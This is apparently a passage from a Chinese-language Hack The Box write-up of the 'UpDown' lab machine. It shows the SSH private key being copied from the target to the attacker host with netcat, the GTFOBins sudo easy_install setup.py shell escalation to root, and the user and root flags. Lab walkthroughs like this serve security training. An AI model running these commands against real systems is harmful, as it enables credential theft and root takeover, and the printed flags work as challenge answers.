┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > id_rsa          
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36702
^C

developer@updown:/home/developer/.ssh$ nc -v 10.10.14.39 80 < ./id_rsa
nc -v 10.10.14.39 80 < ./id_rsa
Connection to 10.10.14.39 80 port [tcp/http] succeeded!
developer@updown:/home/developer/.ssh$ 


┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa           
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh developer@10.10.11.177 -i id_rsa 
The authenticity of host '10.10.11.177 (10.10.11.177)' can't be established.
ED25519 key fingerprint is SHA256:c0DzrPfIOA6IA7zGJh7Ee/FJ3B2g7R2KnzeUif9zCWQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.177' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Apr 28 07:16:45 UTC 2024

  System load:           0.0
  Usage of /:            49.9% of 2.84GB
  Memory usage:          16%
  Swap usage:            0%
  Processes:             230
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.177
  IPv6 address for eth0: dead:beef::250:56ff:feb9:5e17


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug 30 11:24:44 2022 from 10.10.14.36
developer@updown:~$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
developer@updown:~$

21、获取下第一个flag信息吧

developer@updown:~$ hostname
updown
developer@updown:~$ cat user.txt
fb982b76b8259718822b80af37be9ad7
developer@updown:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.177  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:5e17  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:5e17  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:5e:17  txqueuelen 1000  (Ethernet)
        RX packets 4074  bytes 385354 (385.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 667  bytes 206816 (206.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 40  bytes 3608 (3.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 40  bytes 3608 (3.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

developer@updown:~$ 

0x02 系统权限获取

22、开始继续枚举

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install
developer@updown:~$ ls -la /usr/local/bin/easy_install
-rwxr-xr-x 1 root root 229 Aug  1  2022 /usr/local/bin/easy_install
developer@updown:~$ cat /usr/local/bin/easy_install
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
developer@updown:~$ 

23、easy_install 是一种在Python中安装软件包的方法，现在已被弃用。它的核心是运行一个 setup.py 脚本，该脚本承诺采取某些操作来安装软件包。由于 easy_install 有效地运行了一个Python脚本，因此从它获得执行是微不足道的。有一个GTFObins页面，其中包含一些复制粘贴以获取shell，但我将自己完成它以更好地理解它。

https://gtfobins.github.io/gtfobins/easy_install/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

24、那就直接利用提权吧，并读取下flag信息

developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ 
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.2Twcv6BdHr
Writing /tmp/tmp.2Twcv6BdHr/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.2Twcv6BdHr/egg-dist-tmp-py4Npp
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty; pty.spawn("/bin/bash")'
root@updown:/tmp/tmp.2Twcv6BdHr# 
root@updown:/tmp/tmp.2Twcv6BdHr# cd ~
root@updown:~# ls -la
total 44
drwx------  6 root root 4096 Apr 28 06:05 .
drwxr-xr-x 19 root root 4096 Aug  3  2022 ..
lrwxrwxrwx  1 root root    9 Jul 27  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root   11 Jun 22  2022 .bash_logout
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Jun 22  2022 .cache
drwxr-xr-x  3 root root 4096 Jul 27  2022 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   66 Aug  1  2022 .selected_editor
drwx------  2 root root 4096 Jun 22  2022 .ssh
-rw-r-----  1 root root   33 Apr 28 06:05 root.txt
drwx------  3 root root 4096 Jun 22  2022 snap
root@updown:~# cat root.txt
7aed504e303e2a960abdcbae6426559d
root@updown:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/493